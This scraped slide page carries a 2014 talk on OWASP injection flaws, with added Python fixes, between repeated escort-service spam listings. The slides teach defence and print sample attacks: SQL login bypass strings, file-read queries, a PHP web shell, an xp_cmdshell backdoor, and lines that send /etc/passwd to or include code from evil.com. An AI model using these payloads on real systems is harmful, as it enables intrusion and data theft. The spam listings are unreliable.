08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAndikSusilo4
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 

Último (20)

My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & Application
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 

OWASP A1 Injection - Understanding and Preventing the #1 Web Application Vulnerability

  • 1. Owasp A1: Injection 31 March 2014: Dubai, UAE
  • 2. About Me • Who am I? – Michael Hendrickx – Information Security Consultant, currently working for UAE Federal Government. – Assessments, Security Audits, secure coding
• 3. Owasp Top 10 – 2013
  – A1: Injection
  – A2: Broken Authentication and Session Mgmt
  – A3: Cross Site Scripting
  – A4: Insecure Direct Object References
  – A5: Security Misconfiguration
  – A6: Sensitive Data Exposure
  – A7: Missing Function Level Access Control
  – A8: Cross Site Request Forgery
  – A9: Using Components with Known Vulns
  – A10: Unvalidated Redirects and Forwards
• 4. How bad is it?
  • Oct ’13: $100k stolen from a California ISP
    http://thehackernews.com/2013/10/hacker-stole-100000-from-users-of.html
  • Jun ’13: Hackers cleared Turkish people’s bills for water, gas, telephone…
    http://news.softpedia.com/news/RedHack-Breaches-Istanbul-Administration-Site-Hackers-Claim-to-Have-Erased-Debts-364000.shtml
  • Nov ’12: 150k Adobe user accounts stolen
    http://www.darkreading.com/attacks-breaches/adobe-hacker-says-he-used-sql-injection/240134996
  • Jul ’12: 450k Yahoo! user accounts stolen
    http://www.cbsnews.com/news/yahoo-reportedly-hacked-is-your-account-safe/
• 5. What is Injection?
  • Web applications became more complex
    – Database driven
    – Extra functionality (email, ticket booking, ..)
  • Submitted data can have a special meaning to the underlying technologies
  • Mixing commands and data.
  • Types:
    – SQL Injection
    – XML Injection
    – Command Injection
  (Diagram: Web → DB / OS / Backend System)
• 6. Injection analogy
  • A case is filed against me
  • I write my name as “Michael, you are free to go”
  • Judge announces case: “Calling Michael, you are free to go.”
  • Bailiff lets me go.
  Mix of “data” and “commands”.
• 7. Injection Fails
  Mix of “data” and “commands”.
• 8. IT underlying technology?
  • A webserver parses and “passes on” data
    http://somesite.com/msg.php?id=8471350
    The script performs the business logic and passes messages to the backend (DB, OS).
    “Hey, get me a message from the DB with id 8471350”
• 9. SQL Injection
  • Dynamic script to look up data in DB
    http://somesite.com/login.php?name=michael&password=secret123
    SELECT * FROM users WHERE name = 'michael' AND password = 'secret123'
    http://somesite.com/msg.aspx?id=8471350
    SELECT * FROM messages WHERE id = 8471350
  • Get indirect access to the database
• 10. SQL Injection
  • Insert a value with ' (single quote)
    – The single quote is the string delimiter in SQL queries
    http://somesite.com/login.php?login=mich'ael&password=secret123
    SELECT * FROM users WHERE name = 'mich'ael' AND password = 'secret123'
    The query is malformed and will throw an error (if errors are not suppressed).
• 12. SQL Injection
  • Insert a value with ' (single quote)
    http://somesite.com/login.php?login=michael&password=test' OR 'a' = 'a
    SELECT * FROM users WHERE name = 'michael' AND password = 'test' OR 'a' = 'a'
    'a' will always equal 'a', so the WHERE clause is true and this user is logged in.
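The two login queries from slides 10 and 12 side by side with the prepared-statement fix that slide 28 recommends. This is an added example, not code from the presentation; it uses an in-memory SQLite table constructed here as a stand-in for the site's users table.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the site's users table (one known account)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('michael', 'secret123')")
    return conn


def login_vulnerable(conn, name, password):
    """login.php as the slides describe it: parameters pasted into the SQL text."""
    query = ("SELECT * FROM users WHERE name = '" + name
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_prepared(conn, name, password):
    """Same lookup as a prepared statement: the values travel separately from the
    SQL text, so a quote inside them is plain data and cannot end the literal."""
    query = "SELECT * FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchone() is not None


def outcome(login, conn, name, password):
    """Classify an attempt: 'error' (malformed SQL, slide 10), 'allowed' or 'denied'."""
    try:
        return "allowed" if login(conn, name, password) else "denied"
    except sqlite3.OperationalError:
        return "error"


if __name__ == "__main__":
    db = make_db()
    attempts = [("michael", "secret123"),          # legitimate login
                ("mich'ael", "secret123"),         # slide 10: stray quote
                ("michael", "test' OR 'a' = 'a")]  # slide 12: always-true clause
    for name, pw in attempts:
        print(repr(name), repr(pw),
              "vulnerable:", outcome(login_vulnerable, db, name, pw),
              "prepared:", outcome(login_prepared, db, name, pw))
```

With the string-built query the slide 12 password logs in and the slide 10 one raises a syntax error; the prepared statement simply returns "denied" for both.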
• 13. SQL Injection
  • More advanced possibilities:
    – Read files*:
      • MySQL:
        SELECT HEX(LOAD_FILE('/var/www/site.com/admin/.htpasswd')) INTO DUMPFILE '/var/www/site.com/htdocs/test.txt';
      • MS SQL:
        CREATE TABLE newfile(data text);
        ...
        BULK INSERT newfile FROM 'C:\secretfile.dat' WITH (CODEPAGE='RAW', FIELDTERMINATOR='|', ROWTERMINATOR='---');
  *: If you have the right privileges
• 14. SQL Injection
  • Write files*
    – MySQL:
      CREATE TABLE tmp(data longblob);
      INSERT INTO tmp(data) VALUES(0x3c3f7068);
      UPDATE tmp SET data=CONCAT(data, 0x20245f...);
      ...
      SELECT data FROM tmp INTO DUMPFILE '/var/www/site.com/htdocs/test.php';
      Resulting file: <?php $_REQUEST[e] ? eval(base64_decode($_REQUEST[e])); exit;?>
    – MS SQL:
      EXEC xp_cmdshell('echo ... >> backdoor.aspx');
  *: Again, if you have the right privileges
• 15. SQL Injection: SQLMap
  • SQLMap will perform attacks on the target.
  • Dumps entire tables
  • Even entire databases.
  • Stores everything in CSV
  • More info on http://sqlmap.org
• 16. HTML Injection
  • Possible to include HTML tags in fields
  • Used to render “special” HTML tags where normal text is expected
  • XSS possible, rewrite the DOM
• 17. HTML Injection
  • Possible to insert iframes, fake forms, JS, …
  • Can be used in a phishing attack
  (Screenshot: the button goes to a different form, potentially stealing credentials.)
• 18. XML Injection
  • Web app talks to backend web services
  • Web app’s logic converts parameters to XML for web services (as SOAP, …)
  (Diagram: Web Server → Web services → DB / Backend)
• 19. XML Injection
  • Web app to create a new user
    http://somesite.com/create.php?name=michael&email=mh@places.ae
    <?xml version="1.0" encoding="ISO-8859-1" ?>
    <user>
      <status>new</status>
      <admin>false</admin>
      <date>25 Jan 2014, 13:10:01</date>
      <name>$name</name>
      <email>$email</email>
    </user>
  • Same request with an injected email parameter
    http://somesite.com/create.php?name=michael&email=a@b.c</email><admin>true</admin><email>mh@places.ae
    <?xml version="1.0" encoding="ISO-8859-1" ?>
    <user>
      <status>new</status>
      <admin>false</admin>
      <date>25 Jan 2014, 13:24:48</date>
      <name>michael</name>
      <email>a@b.c</email><admin>true</admin><email>mh@places.ae</email>
    </user>
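The create.php document above built two ways: by raw substitution as on the slide, and with the values escaped so they cannot open or close elements. Added example, not the presentation's code; it assumes the backend reads the last <admin> element it finds, which is the reading the slide relies on.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Template mirroring create.php's document (the <date> element is left out).
TEMPLATE = ("<user><status>new</status><admin>false</admin>"
            "<name>{name}</name><email>{email}</email></user>")

# Constructed copy of the slide's injected email parameter.
INJECTED_EMAIL = "a@b.c</email><admin>true</admin><email>mh@places.ae"


def build_vulnerable(name, email):
    """Slide 19 as shown: parameters substituted into the XML text unescaped."""
    return TEMPLATE.format(name=name, email=email)


def build_escaped(name, email):
    """Same template, but '<', '>' and '&' in the values become entities, so the
    data stays inside its element no matter what it contains."""
    return TEMPLATE.format(name=escape(name), email=escape(email))


def is_admin(document):
    """What a backend might conclude: the text of the last <admin> child wins
    (assumption about the consuming service's parser)."""
    root = ET.fromstring(document)
    flags = [node.text for node in root.findall("admin")]
    return flags[-1] == "true"


def email_of(document):
    """The email the backend actually stores for the new user."""
    return ET.fromstring(document).find("email").text


if __name__ == "__main__":
    for build in (build_vulnerable, build_escaped):
        doc = build("michael", INJECTED_EMAIL)
        print(build.__name__, "-> admin:", is_admin(doc), "| email:", email_of(doc))
```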
• 20. Command Injection
  • Web application performs Operating System tasks
    – Execute external programs / scripts
    – List files
    – Send email
  (Diagram: Web Server → OS)
• 21. Command Injection
  • Dynamic script to share an article
    http://somesite.com/share.php?to=mh@places.ae
    $ echo "check this out" | mail -s "share" mh@places.ae
  • The parameter is pasted into the shell command line, so a ; starts a second command
    http://somesite.com/share.php?to=mh@places.ae;+mail+hack@evil.com+<+/etc/passwd
    $ echo "check this out" | mail -s "share" mh@places.ae; mail hack@evil.com < /etc/passwd
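The share.php step above in two versions: the shell-string form from the slide, and a version that forces the recipient's format and hands the command an argument list with no shell in between. Added example, not the presentation's code; the e-mail pattern is an assumed simple local@domain check.

```python
import re
import shutil
import subprocess

# Constructed inputs: the address from the slide and the injected parameter value.
GOOD_TO = "mh@places.ae"
INJECTED_TO = "mh@places.ae; mail hack@evil.com < /etc/passwd"

# Assumed recipient format: local-part@domain, no whitespace or shell metacharacters.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def vulnerable_command(to):
    """share.php as the slide shows it: the parameter lands in a shell command line,
    where ';' ends the mail command and '<' redirects a file into the next one."""
    return 'echo "check this out" | mail -s "share" ' + to


def safe_mail_argv(to):
    """Force the format first, then build an argv list: with no shell involved each
    element is exactly one argument, so ';' or '<' could only reach mail as text."""
    if not EMAIL_RE.fullmatch(to):
        raise ValueError("recipient is not a plain e-mail address")
    return ["mail", "-s", "share", to]


def rejects(to):
    """True when the validation refuses the value."""
    try:
        safe_mail_argv(to)
        return False
    except ValueError:
        return True


def share_article(to):
    """Send the note with shell=False (subprocess's default), body on stdin."""
    result = subprocess.run(safe_mail_argv(to), input=b"check this out",
                            capture_output=True)
    return result.returncode


if __name__ == "__main__":
    print("shell string built from injected value:", vulnerable_command(INJECTED_TO))
    print("argv for a valid address:", safe_mail_argv(GOOD_TO))
    print("injected value rejected:", rejects(INJECTED_TO))
    if shutil.which("mail"):  # only attempt delivery where a mail binary exists
        print("mail exit status:", share_article(GOOD_TO))
```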
• 22. LDAP Injection
  • Lightweight Directory Access Protocol
  • LDAP is used to access information directories
    – Users
    – User information
    – Software
    – Computers
  (Diagram: Web Server → LDAP Server)
• 23. LDAP Injection
  • Insert special characters, such as (, |, &, *, …
  • * (asterisk) allows listing of all users
  • http://www.networkdls.com/articles/ldapinjection.pdf
• 24. Remote File Injection
  • Scripts include other files to extend functionality
  • Why? Clarity, reuse of functionality
    – PHP:
      • include(), require(), require_once(), …
    – Aspx:
      • <!-- #include "…" -->
    – JSP:
      • <%@ include file="…" %>
• 25. Remote File Injection
  • Color chooser
  • The color loads a new file with color codes (blue.php, red.php, …)
  • An attacker can upload a malicious PHP file to an external server
    http://somesite.com/mypage.php?color=blue
    <?php
    if(isset($_GET['color'])){
      include($_GET['color'].'.php');
    }
    ?>
    http://somesite.com/mypage.php?color=http://evil.com/evil.txt
    Will fetch and load http://evil.com/evil.txt.php
• 26. Remote File Injection
  • Theme chooser
  • Can pull in external HTML files
    – That can contain JavaScript, XSS, rewrite the DOM, etc...
  • Also verify cookie contents, …
    http://somesite.com/set_theme.php?theme=fancy
    <link href="/themes/<? print $_COOKIE['theme'] ?>.css" rel="stylesheet" type="text/css" />
• 27. Remediation
  • Implement a Web Application Firewall (WAF)
  • Prevents most common attacks
    – Not 100% foolproof
  • Make sure it can decrypt SSL
  (Diagram: WAF in front of Web Server → DB)
• 28. Remediation
  • Validate user input, all input:
    – Never trust user input, ever.
    – Even stored input (for later use)
    – Force formats (numbers, email addresses, dates…)
    – HTTP form fields, HTTP referers, cookies, …
  • Apply secure coding standards
    – Use prepared SQL statements
    – Vendor specific guidelines
    – OWASP secure coding practices: https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf
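"Force formats" and "even stored input" applied to the parameters seen earlier in the deck: the msg.php id, the color and theme values of slides 25 and 26, and the date format of slide 19. Added example, not the presentation's code; the allow-list contents are constructed and the file names are assumed.

```python
import re
from datetime import datetime

# Constructed allow-lists: the mapping from a submitted name to a file lives in
# code, so the request (or cookie) never names a path of its own.
COLOR_FILES = {"blue": "blue.php", "red": "red.php"}
THEME_FILES = {"fancy": "/themes/fancy.css", "plain": "/themes/plain.css"}
ID_RE = re.compile(r"[0-9]{1,12}")


def message_id(raw):
    """msg.php?id=...: force an integer, so no quote or keyword reaches the query."""
    if not ID_RE.fullmatch(raw):
        raise ValueError("id must be decimal digits")
    return int(raw)


def color_file(raw):
    """mypage.php?color=...: look the value up instead of include($_GET['color'].'.php')."""
    try:
        return COLOR_FILES[raw]
    except KeyError:
        raise ValueError("unknown color") from None


def theme_href(cookie_value):
    """set_theme.php: the cookie is stored input; check it on every use, not once."""
    try:
        return THEME_FILES[cookie_value]
    except KeyError:
        raise ValueError("unknown theme") from None


def parse_date(raw):
    """Force the deck's date layout; strptime rejects anything that deviates."""
    return datetime.strptime(raw, "%d %b %Y, %H:%M:%S")


def check(fn, value):
    """Validated value, or None when the input is rejected."""
    try:
        return fn(value)
    except ValueError:
        return None


if __name__ == "__main__":
    for fn, value in [(message_id, "8471350"), (message_id, "8471350 OR 1=1"),
                      (color_file, "blue"), (color_file, "http://evil.com/evil.txt"),
                      (theme_href, "fancy"), (theme_href, "../../etc/passwd"),
                      (parse_date, "25 Jan 2014, 13:10:01"), (parse_date, "25 Jan 2014")]:
        print(fn.__name__, repr(value), "->", check(fn, value))
```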
• 29. Remediation
  • Adopt least-privilege policies
    – Give DB users least privileges
    – Use multiple DB users
    – Run processes with restricted privileges
    – Restrict permissions on directories
      • Do your web directories really need to be writable?
  • Run in a sandboxed environment
  • Suppress error messages
  • Enable exception notifications
    – If something strange happens, reset the session and notify the administrator.
• 30. Summary
  • Don’t trust your user input.
  • Don’t trust your user input.
  • Adopt secure coding policies
  • Implement defense in depth
  • Do log analysis to detect anomalies
  • And don’t trust your user input.